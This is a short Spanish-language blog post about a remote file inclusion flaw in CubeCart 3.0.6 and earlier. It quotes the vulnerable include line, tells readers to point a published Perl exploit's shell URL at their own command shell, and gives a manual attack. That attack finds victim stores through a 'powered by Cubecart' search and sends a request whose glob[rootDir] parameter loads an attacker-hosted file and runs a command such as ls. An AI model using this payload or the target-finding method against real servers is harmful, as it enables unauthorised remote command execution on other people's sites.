CubeCart <=3.0.6 Remote Command Execution Exploit...
Un Fallo en Cubecart permite a un atacante poder ejecutar comandos remotamente en un servidor victima...
El Bug se centra en estas lineas:
include($glob['rootDir']."/classes/htmlMimeMail.php"); (Tipico file inclusion)
Existe publicado un Exploit en Perl
NOTA; en esta linea cambiar: $shel = "http://website.com/cmd.txt"; # cmd shell url por donde se encuentra tu cmd
Explotacion Manual: google =) "powered by Cubecart" y agregamos simplemente a modo de ejemplo:
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://tu-servidor.com/hack/nuevo.gif?&cmd=ls
o podemos usar los botshell como ya explique antes...
Salu2
0 Comments:
Publicar un comentario
<< Home